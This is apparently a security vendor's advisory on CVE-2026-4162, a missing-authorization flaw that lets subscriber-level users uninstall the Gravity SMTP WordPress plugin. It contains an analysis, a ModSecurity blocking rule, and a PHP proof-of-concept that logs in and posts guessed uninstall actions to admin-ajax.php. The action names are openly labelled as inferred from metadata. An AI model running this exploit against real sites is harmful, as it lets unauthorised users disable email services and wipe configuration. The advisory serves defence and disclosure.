Atomic Edge analysis of CVE-2026-4162 (metadata-based):
This vulnerability is a missing authorization flaw in the Gravity SMTP WordPress plugin versions up to and including 2.1.4. The vulnerability allows authenticated attackers with subscriber-level permissions or higher to uninstall and deactivate the plugin and delete its options. The CVSS score of 7.1 (High) reflects the combination of low attack complexity, no user interaction required, and high impact on integrity with low impact on availability.
Atomic Edge research infers the root cause is a WordPress AJAX handler or admin POST endpoint that lacks proper capability checks. The CWE-862 classification indicates the plugin likely registers a function for uninstalling or deactivating the plugin via a WordPress hook (such as wp_ajax_ or admin_post_) but fails to verify the user has the required administrative capabilities (like manage_options or activate_plugins). This inference is based on the vulnerability description and common WordPress plugin patterns. The description confirms the flaw exists but does not provide the exact code location.
Exploitation requires an authenticated attacker with subscriber-level access. The attacker sends a crafted HTTP POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) or the admin-post endpoint (/wp-admin/admin-post.php). The request includes an action parameter specific to the Gravity SMTP plugin’s uninstall or deactivation functionality. The exact action name is not confirmed from metadata, but plausible values include gravitysmtp_uninstall, gravitysmtp_deactivate, or similar. The request may also include a nonce parameter, but the vulnerability description notes CSRF is possible, indicating nonce verification is also missing or insufficient. A successful request triggers the plugin’s uninstall routine, removing its options and deactivating it.
The remediation likely involves adding proper capability checks to the vulnerable endpoint. The patched version (2.1.5) should verify the current user has appropriate administrative privileges (like manage_options) before executing any plugin uninstall, deactivation, or option deletion operations. The fix should also include proper nonce verification to mitigate the CSRF vector mentioned in the description. These changes align with WordPress security best practices for protecting administrative actions.
Exploitation leads to complete plugin uninstallation and option deletion. This constitutes a high integrity impact (I:H) as the attacker can alter the site’s configuration and disable a core service (email delivery). The low availability impact (A:L) reflects potential disruption to email functionality but not total site outage. Attackers could disable security or monitoring plugins in a chain attack. The CSRF vector allows exploitation via a malicious link or site, increasing the attack surface.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4162 (metadata-based)
# This rule blocks exploitation of the missing authorization vulnerability in Gravity SMTP plugin.
# The rule targets the AJAX endpoint with specific action parameters used for uninstall/deactivation.
# The rule uses exact string matching for precision.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20264162,phase:2,deny,status:403,chain,msg:'CVE-2026-4162: Gravity SMTP Missing Authorization Exploit Attempt',severity:'CRITICAL',tag:'CVE-2026-4162',tag:'WordPress',tag:'Plugin-GravitySMTP'"
SecRule ARGS_POST:action "@pm gravitysmtp_uninstall gravitysmtp_deactivate gravitysmtp_delete_options gravitysmtp_remove"
"t:lowercase"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4162 - Gravity SMTP <= 2.1.4 - Missing Authorization to Authenticated (Subscriber+) Plugin Uninstall
<?php
/**
* Proof of Concept for CVE-2026-4162.
* This script simulates an authenticated subscriber-level attacker exploiting the missing authorization
* to trigger plugin uninstall/deactivation. The exact AJAX action name is inferred from plugin patterns.
* Assumptions:
* 1. The vulnerable endpoint is /wp-admin/admin-ajax.php (common for WordPress AJAX handlers).
* 2. The action parameter is 'gravitysmtp_uninstall' or similar (inferred from plugin slug).
* 3. No nonce is required (CSRF vector indicates missing nonce check).
* 4. The attacker has valid subscriber-level WordPress credentials.
*/
$target_url = 'https://victim-site.com'; // CHANGE THIS
$username = 'subscriber_user'; // CHANGE THIS - subscriber-level account
$password = 'subscriber_pass'; // CHANGE THIS
// Step 1: Authenticate to WordPress to obtain session cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only
$response = curl_exec($ch);
// Step 2: Send exploit payload to AJAX endpoint
// Attempt multiple plausible action names based on common plugin patterns
$possible_actions = ['gravitysmtp_uninstall', 'gravitysmtp_deactivate', 'gravitysmtp_delete_options', 'gravitysmtp_remove'];
foreach ($possible_actions as $action) {
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'action' => $action
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$ajax_response = curl_exec($ch);
echo "Attempting action: $actionn";
echo "Response: $ajax_responsenn";
// Optional: Add delay between attempts
sleep(1);
}
curl_close($ch);
unlink('cookies.txt'); // Clean up
?>
